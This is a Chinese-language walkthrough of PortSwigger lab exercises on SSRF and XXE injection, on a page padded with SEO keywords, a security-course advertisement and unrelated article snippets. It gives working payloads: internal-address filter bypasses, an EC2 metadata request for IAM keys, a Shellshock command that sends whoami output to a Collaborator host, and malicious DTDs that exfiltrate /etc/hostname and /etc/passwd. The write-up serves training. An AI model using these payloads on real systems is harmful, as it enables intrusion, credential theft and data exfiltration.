wp风格网站龙岩抖音seo搜索排名

张小明 2026/1/8 10:23:19
wp风格网站,龙岩抖音seo搜索排名,wordpress菜单栏换色,织梦网站列表声明 本文仅供学习参考#xff0c;其中涉及的一切资源均来源于网络#xff0c;请勿用于任何非法行为#xff0c;否则您将自行承担相应后果 一、Server-side request forgery (SSRF) 01、Basic SSRF against the local server 描述 该实验室具有库存检查功能#xff0c…声明本文仅供学习参考其中涉及的一切资源均来源于网络请勿用于任何非法行为否则您将自行承担相应后果一、Server-side request forgery (SSRF)01、Basic SSRF against the local server描述该实验室具有库存检查功能可从内部系统获取数据。为了解决实验室更改股票检查 URL 以访问管理界面http://localhost/admin并删除用户carlos。解决方案1.浏览/admin并观察您无法直接访问管理页面。2.访问一个产品点击“Check stock”拦截Burp Suite中的请求发送给Burp Repeater。3.将stockApi参数中的 URL 更改为http://localhost/admin. 这应该显示管理界面。4.阅读 HTML 确定删除目标用户的 URL即 http://localhost/admin/delete?usernamecarlos5.在stockApi参数中提交这个 URL 来传递SSRF 攻击。02、Basic SSRF against another back-end system描述该实验室具有库存检查功能可从内部系统获取数据。为了解决实验室问题请使用库存检查功能处的漏洞扫描192.168.0.XC段哪个IP的 8080端口 上开启了WEB服务管理界面然后使用它删除用户carlos。解决方案1.访问一个产品点击“Check stock”拦截Burp Suite中的请求发送给Burp Intruder。 2.单击“clear §”将stockApi参数更改为http://192.168.0.1:8080/admin对 IP 地址的最后一个八位字节数字1单击“添加有效载荷 §”。3.切换到Payloads选项卡将payload类型改为Numbers在“From”、“To”和“Step”框中分别输入1、255和1。意思是从1到255遍历点击“开始攻击”。4.单击“状态”列可按状态代码升序对其进行排序。您应该会看到一个状态为 200 的条目显示了一个管理界面。5.点击这个请求发送到Burp Repeater将里面的路径改成stockApi/admin/delete?usernamecarlos03、SSRF with blacklist-based input filter描述该实验室具有库存检查功能可从内部系统获取数据。为了解决实验室更改股票检查 URL 以访问管理界面http://localhost/admin并删除用户carlos。开发人员部署了两个您需要绕过的弱反 SSRF 防御。解决方案1.访问一个产品点击“Check stock”拦截Burp Suite中的请求发送给Burp Repeater。 2.将stockApi参数中的 URL 更改为http://127.0.0.1/请求被阻止。3.通过将 URL 更改为以下内容来绕过块 http://127.1/使用的替代IP表示127.0.0.1例如2130706433017700000001或127.1。4.将 URL 更改为http://127.1/admin并观察该 URL 再次被阻止。5.通过双 URL 编码将“a”混淆为 %2561 以访问管理界面并删除目标用户。a的url编码结果是%61%的url编码是%256.删除carlosstockApihttp://127.1/%2561dmin/delete?usernamecarlos04、SSRF with whitelist-based input filter基于白名单绕过滤的ssrf某些应用程序仅允许与允许值的白名单匹配、以该白名单开头或包含该白名单的输入。在这种情况下您有时可以通过利用 URL 解析中的不一致来绕过过滤器。URL 规范包含许多在实现 URL 的临时解析和验证时容易被忽视的功能您可以使用字符在 URL 中的主机名之前嵌入凭据。例如https://expected-hostevil-host。您可以使用#字符来表示 URL 片段。例如https://evil-host#expected-host。您可以利用 DNS 命名层次结构将所需的输入放入您控制的完全限定的 DNS 名称中。例如https://expected-host.evil-host。您可以对字符进行 URL 编码以混淆 URL 解析代码。如果实现过滤器的代码处理 URL 编码字符的方式不同于执行后端 HTTP 请求的代码这将特别有用。您可以结合使用这些技术。描述该实验室具有库存检查功能可从内部系统获取数据。为了解决实验室更改股票检查 URL 以访问管理界面http://localhost/admin并删除用户carlos。开发人员已部署了您需要绕过的反 SSRF 防御。解决方案1.访问一个产品点击“Check stock”拦截Burp Suite中的请求发送给Burp Repeater。 2.fuzz测试应用程序对哪些连接符进行过滤将stockApi参数中的 URL 更改为http://127.0.0.1stock.weliketoshop.net添加位置为有效载荷。%2540 %2523 %252e分别是#.可以得出连接符可用未被过滤。 3.fuzz测试应用程序对本地地址的过滤5.遍历结果发现%2523未被过滤这是#的双重编码。.6.更改 URL 以localhost:80%2523stock.weliketoshop.net/admin/delet…访问管理界面并删除目标用户。05、SSRF with filter bypass via open redirection vulnerability描述该实验室具有库存检查功能可从内部系统获取数据。为了解决实验室更改股票检查 URL 以访问管理界面http://192.168.0.12:8080/admin并删除用户carlos。库存检查器已被限制为只能访问本地应用程序因此您需要首先找到影响应用程序的开放重定向。解决方案1.访问一个产品点击“Check stock”拦截Burp Suite中的请求发送给Burp Repeater。 2.尝试篡改stockApi参数并观察到无法让服务器直接向不同的主机发出请求。 3.单击“Next product”并观察该path参数被放置在重定向响应的 Location 标头中从而导致打开重定向。4.创建一个利用开放重定向漏洞的 URL并重定向到管理界面并将其提供给stockApi股票检查器上的参数/product/nextProduct?pathhttp://192.168.0.12:8080/admin5.修改删除目标用户的路径/product/nextProduct?pathhttp://192.168.0.12:8080/admin/delete?usernamecarlos06、Blind SSRF with out-of-band detection描述该站点使用分析软件在加载产品页面时获取在 Referer 标头中指定的 URL。要解决实验室问题请使用此功能向公共 Burp Collaborator 服务器发出 HTTP 请求。解决方案1.在Burp Suite Professional 中转到 Burp 菜单并启动Burp Collaborator 客户端。2.单击“复制到剪贴板”将唯一的 Burp Collaborator 负载复制到剪贴板。让 Burp Collaborator 客户端窗口保持打开状态。9ku1dr3wc25eze1famnlfqnqfhl79w.burpcollaborator.net3.访问一个产品拦截 Burp Suite 中的请求并将其发送到 Burp Repeater。4.更改 Referer 标头以使用生成的 Burp Collaborator 域代替原始域。发送请求。5.返回 Burp Collaborator 客户端窗口然后单击“Poll now”。如果您没有看到列出的任何交互请等待几秒钟并重试因为服务器端命令是异步执行的。6.您应该会看到一些由应用程序启动的 DNS 和 HTTP 交互这些交互是您的负载的结果。07、Blind SSRF with Shellshock exploitation描述该站点使用分析软件在加载产品页面时获取在 Referer 标头中指定的 URL。为了解决实验室问题使用此功能对端口 8080 范围内的内部服务器执行盲 SSRF攻击192.168.0.X。在盲攻击中使用针对内部服务器的 Shellshock 负载来窃取操作系统用户的名称。解决方案1.在Burp Suite Professional 中从 BApp Store 安装“Collaborator Everywhere”扩展。2.将靶场的域添加到 Burp Suite 的目标范围以便 Collaborator Everywhere 将其作为目标。 浏览网站。3.开始浏览产品页面随便找几个商品点进去在点击return插件会通过 Referer 标头触发与 Burp Collaborator 的 HTTP 交互。4.观察 HTTP 交互在 HTTP 请求中包含您的 User-Agent 字符串。将请求发送到产品页面给 Burp Intruder。5.使用Burp Collaborator 客户端生成唯一的 Burp Collaborator 有效载荷并将其放入以下 Shellshock 有效载荷中() { :; }; /usr/bin/nslookup $(whoami).YOUR-SUBDOMAIN-HERE.burpcollaborator.net6.将 Burp Intruder 请求中的 User-Agent 字符串替换为包含您的 Collaborator 域的 Shellshock 负载。单击“clear §”更改 Referer 标头http://192.168.0.1:8080然后突出显示 IP 地址的最后一个八位字节数字1单击“添加 §”。7.切换到Payloads选项卡将payload类型改为Numbers在“From”、“To”和“Step”框中分别输入1、255和1。 点击“开始攻击”。8.攻击完成后返回 Burp Collaborator 客户端窗口然后单击“Poll now”。如果您没有看到列出的任何交互请等待几秒钟并重试因为服务器端命令是异步执行的。您应该看到由成功的盲目SSRF 攻击攻击的后端系统发起的 DNS 交互。操作系统用户的名称应出现在 DNS 子域中。9.要完成实验请输入操作系统用户的名称。peter-I7hfdy二、XXE injection01、Exploiting XXE using external entities to retrieve files描述该实验室具有“Check stock”功能可解析 XML 输入并在响应中返回任何意外值。为了解决实验室问题注入一个 XML 外部实体来检索/etc/passwd文件的内容。解决方案1.访问产品页面单击“Check stock”然后在 Burp Suite 中拦截生成的 POST 请求。2.在 XML 声明和stockCheck元素之间插入以下外部实体定义!DOCTYPE test [ !ENTITY xxe SYSTEM file:///etc/passwd ] --------------------------------------------------------------------------------- ?xml version1.0 encodingUTF-8? !DOCTYPE test [ !ENTITY xxe SYSTEM file:///etc/passwd ] stockCheck productIdxxe;/productId storeId1/storeId /stockCheck3.将productId数字替换为对外部实体的引用xxe;。响应应包含Invalid product ID:后跟/etc/passwd文件的内容。02、Exploiting XXE to perform SSRF attacks描述该实验室具有Check Stock功能可解析 XML 输入并在响应中返回任何意外值。实验室服务器在默认 URL 上运行模拟的EC2 元数据端点即http://169.254.169.254/. 此端点可用于检索有关实例的数据其中一些可能是敏感的。为解决实验室利用XXE漏洞执行SSRF攻击从EC2元数据端点获取服务器的IAM秘密访问密钥。解决方案1.访问产品页面单击“Check Stock”然后在 Burp Suite 中拦截生成的 POST 请求。2.在 XML 声明和stockCheck元素之间插入以下外部实体定义!DOCTYPE test [ !ENTITY xxe SYSTEM http://169.254.169.254/ ] --------------------------------------------------------------------------------- ?xml version1.0 encodingUTF-8? !DOCTYPE test [ !ENTITY xxe SYSTEM http://169.254.169.254/ ] stockCheck productIdxxe;/productId storeId1/storeId /stockCheck3.将productId数字替换为对外部实体的引用xxe;。响应应包含“无效的产品 ID”后跟来自元数据端点的响应最初是文件夹名称。4.迭代更新 DTD 中的 URL 以探索 API直到到达/latest/meta-data/iam/security-credentials/admin. 这应该返回包含SecretAccessKey.03、Blind XXE with out-of-band interaction描述该实验室具有“Check stock”功能可解析 XML 输入但不显示结果。您可以通过触发与外部域的带外交互来检测盲 XXE漏洞。为了解决实验室问题使用外部实体使 XML 解析器向 Burp Collaborator 发出 DNS 查找和 HTTP 请求。解决方案1.访问产品页面单击“Check stock”并拦截Burp Suite Professional 中生成的 POST 请求。2.转到 Burp 菜单然后启动Burp Collaborator 客户端。3.单击“Copy to clipboard”将唯一的 Burp Collaborator 负载复制到剪贴板。让 Burp Collaborator 客户端窗口保持打开状态。4.在 XML 声明和stockCheck元素之间插入以下外部实体定义但在指示的地方插入 Burp Collaborator 子域5.将productId数字替换为对外部实体的引用xxe;!DOCTYPE stockCheck [ !ENTITY xxe SYSTEM http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net ] --------------------------------------------------------------------------------- ?xml version1.0 encodingUTF-8? !DOCTYPE stockCheck [ !ENTITY xxe SYSTEM http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net ] stockCheck productIdxxe;/productId storeId1/storeId /stockCheck6.返回 Burp Collaborator 客户端窗口然后单击“Poll now”。如果您没有看到列出的任何交互请等待几秒钟然后重试。您应该会看到一些由应用程序启动的 DNS 和 HTTP 交互这些交互是您的负载的结果。04、Blind XXE with out-of-band interaction via XML parameter entities描述该实验室具有“Check stock”功能可解析 XML 输入但不显示任何意外值并阻止包含常规外部实体的请求。为了解决实验室问题使用参数实体让 XML 解析器向 Burp Collaborator 发出 DNS 查找和 HTTP 请求。解决方案1.访问产品页面单击“Check stock”并拦截Burp Suite Professional 中生成的 POST 请求。2.转到 Burp 菜单然后启动Burp Collaborator 客户端。3.单击“Copy to clipboard”将唯一的 Burp Collaborator 负载复制到剪贴板。让 Burp Collaborator 客户端窗口保持打开状态。4.在 XML 声明和stockCheck元素之间插入以下外部实体定义但在指示的地方插入 Burp Collaborator 子域!DOCTYPE foo [!ENTITY % xxe SYSTEM http://1652ffdx6ehfr67aox39dcqfw62wql.burpcollaborator.net %xxe; ]5.返回 Burp Collaborator 客户端窗口然后单击“Poll now”。如果您没有看到列出的任何交互请等待几秒钟然后重试。您应该会看到一些由应用程序启动的 DNS 和 HTTP 交互这些交互是您的负载的结果。05、Exploiting blind XXE to exfiltrate data using a malicious external DTD描述该实验室具有“Check stock”功能可解析 XML 输入但不显示结果。要解决实验室问题请提取/etc/hostname文件的内容。解决方案1.使用Burp Suite Professional转到 Burp 菜单然后启动Burp Collaborator 客户端。2.单击“Copy to clipboard”将唯一的 Burp Collaborator 负载复制到剪贴板。让 Burp Collaborator 客户端窗口保持打开状态。3.将 Burp Collaborator 负载放入恶意 DTD 文件中注意这里%是%的HTML编码结果参数实体嵌套定义需要注意的是内层的定义的参数实体% 需要进行HTML转义否则会出现解析错误。 ​ 第二层嵌套时我们只需要给定义参数实体的%编码第三层就需要在第二层的基础上将所有%、、’、” html编码。 ​ 引用cloud.tencent.com/developer/a…!ENTITY % file SYSTEM file:///etc/hostname !ENTITY % eval !ENTITY #x25; exfil SYSTEM http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/?x%file; %eval; %exfil;4.单击“Store”并将恶意 DTD 文件保存在您的服务器上。单击“view exploit”并记下 URL。https://exploit-ac321fb71f19af9380507e4301ff00c7.web-security-academy.net/exploit5.您需要通过添加引用恶意 DTD 的参数实体来利用Check stock功能。首先访问产品页面单击“Check stock”并在 Burp Suite 中拦截生成的 POST 请求。6.在 XML 声明和stockCheck元素之间插入以下外部实体定义!DOCTYPE foo [!ENTITY % xxe SYSTEM https://exploit-ac321fb71f19af9380507e4301ff00c7.web-security-academy.net/exploit %xxe;]7.返回 Burp Collaborator 客户端窗口然后单击“Poll now”。如果您没有看到列出的任何交互请等待几秒钟然后重试。8.您应该会看到一些由应用程序启动的 DNS 和 HTTP 交互这些交互是您的负载的结果。HTTP 交互可以包含/etc/hostname文件的内容。读取结果94c9f0a3f38106、Exploiting blind XXE to retrieve data via error messages描述该实验室具有“Check stock”功能可解析 XML 输入但不显示结果。要解决该实验请使用外部 DTD 触发显示/etc/passwd文件内容的错误消息。该实验室包含指向不同域上的漏洞利用服务器的链接您可以在其中托管恶意 DTD。解决方案1.单击“Go to exploit server”并将以下恶意 DTD 文件保存在您的服务器上 导入时此页面会将其内容读入实体然后尝试在文件路径中使用该实体。!ENTITY % file SYSTEM file:///etc/passwd !ENTITY % eval !ENTITY #x25; exfil SYSTEM file:///invalid/%file; %eval; %exfil;2.单击“View exploit”并记下恶意 DTD 的 URL。https://exploit-acc71f791e474f81803e1f22016400d8.web-security-academy.net/ch4nge.dtd3.您需要通过添加引用恶意 DTD 的参数实体来利用股票检查器功能。首先访问产品页面单击“Check stock”并在 Burp Suite 中拦截生成的 POST 请求。4.在 XML 声明和stockCheck元素之间插入以下外部实体定义 您应该看到一条包含文件内容的错误消息。!DOCTYPE foo [!ENTITY % xxe SYSTEM https://exploit-acc71f791e474f81803e1f22016400d8.web-security-academy.net/ch4nge.dtd %xxe;]XML parser exited with non-zero code 1: /invalid/07、Exploiting XXE to retrieve data by repurposing a local DTD通过复用本地DTD利用XXE盲打如果目标不出网或者有某限制不能使用外部dtd实体这时可以尝试使用本地的dtd实体就是把dtd的语句写在靶机里。描述该实验室具有“Check stock”功能可解析 XML 输入但不显示结果。要解决实验室问题请触发一条包含/etc/passwd文件内容的错误消息。您需要引用服务器上现有的 DTD 文件并从中重新定义实体。暗示使用 GNOME 桌面环境的系统通常在包含一个名为/usr/share/yelp/dtd/docbookx.dtd的实体时有一个 DTDISOamso.解决方案1.访问产品页面单击“Check stock”并在Burp Suite中截获生成的POST请求。2.在XML声明和stockCheck元素之间插入以下参数实体定义!DOCTYPE message [ !ENTITY % local_dtd SYSTEM file:///usr/share/yelp/dtd/docbookx.dtd !ENTITY % ISOamso !ENTITY #x25; file SYSTEM file:///etc/passwd !ENTITY #x25; eval !ENTITY #x26;#x25; error SYSTEM #x27;file:///nonexistent/#x25;file;#x27; #x25;eval; #x25;error; %local_dtd; ]这将导入Yelp DTD然后重新定义ISOamso实体触发包含/etc/passwd文件内容的错误消息。暗示中提到一个内部的DTD/usr/share/yelp/dtd/docbookx.dtd这个内部DTD中有一个参数实体叫ISOamso然后重写这个参数实体。注意参数实体嵌套定义需要注意的是内层的定义的参数实体% 需要进行HTML转义否则会出现解析错误。 ​ 第二层嵌套时我们只需要给定义参数实体的%编码第三层就需要在第二层的基础上将所有%、、’、” html编码。 ​ 引用cloud.tencent.com/developer/a…08、Exploiting XInclude to retrieve files描述该实验室具有“check stock”功能该功能将用户输入嵌入服务器端 XML 文档中随后对其进行解析。因为您无法控制整个 XML 文档所以您无法定义 DTD 来发起经典的XXE攻击。要解决实验室问题请注入一条XInclude语句来检索/etc/passwd文件的内容。解决方案1.访问产品页面单击“检查库存”然后在 Burp Suite 中拦截生成的 POST 请求。2.将productId参数值设置为foo xmlns:xihttp://www.w3.org/2001/XIncludexi:include parsetext hreffile:///etc/passwd//foo09、Exploiting XXE via image file upload描述该实验室允许用户将头像附加到评论中并使用 Apache Batik 库来处理头像图像文件。要解决实验室问题请上传/etc/hostname处理后显示文件内容的图像。然后使用“提交解决方案”按钮提交服务器主机名的值。暗示SVG 图像格式使用 XML。解决方案1.使用以下内容创建本地 SVG 图像?xml version1.0 standaloneyes?!DOCTYPE test [ !ENTITY xxe SYSTEM file:///etc/hostname ]svg width128px height128px xmlnshttp://www.w3.org/2000/svg xmlns:xlinkhttp://www.w3.org/1999/xlink version1.1text font-size16 x0 y16xxe;/text/svg2.在博客文章上发表评论并上传此图片作为头像。3.查看评论时您应该会在图像中看到/etc/hostname文件的内容。使用“提交解决方案”按钮提交服务器主机名的值。提交7174a45a0efa互动话题如果你想学习更多**网络安全方面**的知识和工具可以看看以下面给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。**读者福利 |**【CSDN大礼包】最新网络安全/网安技术资料包~282G无偿分享**安全链接放心点击**!如果二维码失效可以点击下方链接去拿一样的哦**读者福利 |**【CSDN大礼包】最新网络安全/网安技术资料包~282G无偿分享**安全链接放心点击**!
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

网站建设各单位强化沟通协作网上教学网站建设

从零开始搞定 Multisim 14.3 安装:新手也能一次成功的实战指南你是不是正为做模电实验、数电课程设计发愁?想画个电路图却苦于没有工具?别急,Multisim 14.3就是为你量身打造的“电子实验室”——不用买元件、不接线、不烧板子&…

张小明 2026/1/7 10:37:42 网站建设

二手网站建设情况宣传页制作

数据库系统的查询性能以及数据一致性的维护一直是数据库技术的核心难题。如何在保证事务的ACID特性前提下,提升查询执行效率和系统的高可用能力,是关系型数据库设计中的重要课题。YashanDB作为面向高性能和高可用性的关系型数据库,采用多种技…

张小明 2026/1/8 22:08:21 网站建设

做框架图的网站旧房装修

Flutter企业级Google身份认证架构深度解析 【免费下载链接】flutter-examples [Examples] Simple basic isolated apps, for budding flutter devs. 项目地址: https://gitcode.com/gh_mirrors/fl/flutter-examples 在移动应用开发领域,安全高效的身份认证机…

张小明 2026/1/7 19:06:20 网站建设

湖北省建设网站wordpress 头像 virtos

文章介绍了学习大模型的必要性,强调其功能强大、应用广泛且能带来更多职业机会。大模型优势在于处理复杂问题、易用性和跨平台支持。作者建议学习者从基础知识入手,通过理论学习与实践操作相结合,逐步深入,并利用开源社区和资源解…

张小明 2026/1/8 22:44:05 网站建设

徐州建站网站模板网站建设入账时进那个会计科目

FPGA开发实战:手把手带你走通Vivado 2018.3的RTL设计全流程你是不是刚接触FPGA,面对Vivado那密密麻麻的按钮和流程一头雾水?综合、实现、仿真、约束……这些术语听起来高大上,但到底怎么用?为什么我的代码烧进去不工作…

张小明 2026/1/7 21:22:04 网站建设

网站文章展示是做怎么2014 网站建设

还在为寻找合适的电子教材而东奔西走吗?国家中小学智慧教育平台电子课本解析工具为您开启教育资源共享新篇章。这款跨平台智能工具让教材获取变得前所未有的简单高效,彻底解决教育资源获取难题。 【免费下载链接】tchMaterial-parser 国家中小学智慧教育…

张小明 2026/1/9 3:05:19 网站建设